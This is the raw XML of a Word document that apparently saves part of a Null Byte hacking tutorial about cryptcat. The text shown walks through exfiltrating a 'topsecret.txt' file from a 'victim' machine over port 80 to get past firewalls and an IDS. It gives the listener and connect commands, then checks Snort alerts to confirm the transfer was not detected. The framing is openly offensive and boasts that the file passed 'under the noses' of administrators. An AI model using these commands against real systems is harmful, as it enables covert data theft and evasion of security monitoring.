        </w:rPr>
        <w:t>Crypcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> Over Port 80 to Evade the Firewall</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lastRenderedPageBreak/>
        <w:t>Although we have successfully created an encrypted backdoor on the victim system, a vigilant security admin will notice that an unusual port (6996) is open. This will likely trigger some action by the security admin to limit our access. In addition, on systems with a good system admin and good firewall, this port will likely be blocked by the firewall.</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For any network to be able to communicate on the Internet, they will likely need to keep open ports 80 and 443, certainly, but also possibly 25, 53, and 110. Since unencrypted, normal Internet traffic travels over port 80, it's nearly always open and a little more traffic will hardly be noticed.</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Now that we have successfully used </w:t>
      </w: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we'll send it over port 80 with all the other Internet traffic. Although it will be encrypted, it will look like any binary data crossing the wire. It will be nearly impossible for the security devices to detect or block it, as they must always allow traffic on port 80, and the traffic is encrypted, so the IDS can't "see" the contents.</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Here we will move a file from the victim's system called </w:t>
      </w:r>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>topsecret.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to our attack system without any of the security devices detecting it. This time, instead of sending a command shell across the wire, we will be sending a top secret file named </w:t>
      </w:r>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>topsecret.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> across our encrypted connection. We can do this by typing at the Windows command prompt:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E25E1" w:rsidRPr="009E25E1" w:rsidRDefault="009E25E1" w:rsidP="009E25E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:num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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cryptcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l p 80 &lt; topsecret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E25E1" w:rsidRPr="009E25E1" w:rsidRDefault="009E25E1" w:rsidP="009E25E1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6505575" cy="876300"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="3" name="Picture 3" descr="https://img.wonderhowto.com/img/37/11/63519198544540/0/hack-like-pro-create-nearly-undetectable-backdoor-with-cryptca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37/11/63519198544540/0/hack-like-pro-create-nearly-undetectable-backdoor-with-cryptcat.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05575" cy="876300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E25E1" w:rsidRPr="009E25E1" w:rsidRDefault="009E25E1" w:rsidP="009E25E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:num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b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-l</w:t>
      </w:r>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> means "open a listener"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E25E1" w:rsidRPr="009E25E1" w:rsidRDefault="009E25E1" w:rsidP="009E25E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:num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b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-p 80</w:t>
      </w:r>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> means "open that listener on port 80"</w:t>
      </w:r>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E25E1" w:rsidRPr="009E25E1" w:rsidRDefault="009E25E1" w:rsidP="009E25E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:num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b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> means "send the following file out this listener"</w:t>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t>Step 7 Connect to the Listener</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Now, let's connect to the victim's system and pull across the top secret file. All we need to do is connect to the listener by typing </w:t>
      </w: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the IP address of the victim system, and the port number of the listener.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E25E1" w:rsidRPr="009E25E1" w:rsidRDefault="009E25E1" w:rsidP="009E25E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:num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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cryptcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.182.248 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E25E1" w:rsidRPr="009E25E1" w:rsidRDefault="009E25E1" w:rsidP="009E25E1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5848350" cy="1885950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="https://img.wonderhowto.com/img/50/30/63519444917863/0/hack-like-pro-create-nearly-undetectable-backdoor-with-cryptca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50/30/63519444917863/0/hack-like-pro-create-nearly-undetectable-backdoor-with-cryptcat.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1885950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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As you can see, the file came across our connection successfully!</w:t>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t>Step 8 Let's Check the Alerts File</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Let's once again check our Snort log files for any evidence that our IDS detected this movement of the top secret file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E25E1" w:rsidRPr="009E25E1" w:rsidRDefault="009E25E1" w:rsidP="009E25E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:num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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kwrite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/snort/alerts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E25E1" w:rsidRPr="009E25E1" w:rsidRDefault="009E25E1" w:rsidP="009E25E1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6915150" cy="3790950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="https://img.wonderhowto.com/img/37/64/63519445301265/0/hack-like-pro-create-nearly-undetectable-backdoor-with-cryptca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37/64/63519445301265/0/hack-like-pro-create-nearly-undetectable-backdoor-with-cryptcat.w1456.jpg">
                      <a:hlinkClick r:id="rId23"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15150" cy="3790950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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lastRenderedPageBreak/>
        <w:t>As you can see, our top secret file sailed right through port 80 under the noses of the sysadmins, IDS, and firewall without a trace!</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xml:space="preserve"> is a great little tool for moving data off the victim's system across the normal open ports without any of the security devices detecting it. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E268C" w:rsidRPr="009E25E1" w:rsidRDefault="004E268C" w:rsidP="009E25E1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="004E268C" w:rsidRPr="009E2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71331"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E08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B54EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2DE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47706"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C632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72605"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="96B2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63E97"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B698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6317E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B360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D7696"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="338C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A17B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74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D1827"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8510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7"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="4"/>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510"/>
    <w:rsid w:val="003706EE"/>
    <w:rsid w:val="004E268C"/>
    <w:rsid w:val="009E25E1"/>
    <w:rsid w:val="00C7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51C76-1628-4A29-BD58-55533A6D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25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5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5E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E25E1"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="series">
    <w:name w:val="series"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009E25E1"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="009E25E1"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009E25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9E25E1"/>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="009E25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609613">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2070496186">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="127284835">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1970278538">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="231039523">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="276956387">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="272445370">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1587809900">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="88695477">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                    </w:div>
                                  </w:divsChild>
                                </w:div>
                                <w:div w:id="214853155">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="634873353">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                    </w:div>
                                  </w:divsChild>
                                </w:div>
                                <w:div w:id="1027487366">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="1070347603">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                    </w:div>
                                  </w:divsChild>
                                </w:div>
                                <w:div w:id="22362525">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="165824827">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                    </w:div>
                                  </w:divsChild>
                                </w:div>
                                <w:div w:id="1093548643">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="1356692010">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                    </w:div>
                                  </w:divsChild>
                                </w:div>
                                <w:div w:id="282150274">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="695620714">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                    </w:div>
                                  </w:divsChild>
                                </w:div>
                                <w:div w:id="1177113329">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="11260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wonderhowto.com/img/original/45/77/63519077742835/0/635190777428354577.jpg" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/hack-like-pro-getting-started-with-backtrack-your-new-hacking-system-0146889/"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img.wonderhowto.com/img/original/50/30/63519444917863/0/635194449178635030.jpg" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/listeners/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpeg"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/73/13/63519445275587/0/635194452755877313.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ull-byte.wonderhowto.com/how-to/hack-like-pro-read-write-snort-rules-evade-nids-network-intrusion-detection-system-0148215/"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ourceforge.net/projects/cryptcat/files/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/60/17/63519197651017/0/635191976510176017.jpg" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-netcat-swiss-army-knife-hacking-tools-0148657/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/37/64/63519445301265/0/635194453012653764.jpg" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/snort/" TargetMode="External"/><Relationship Id="rId19" 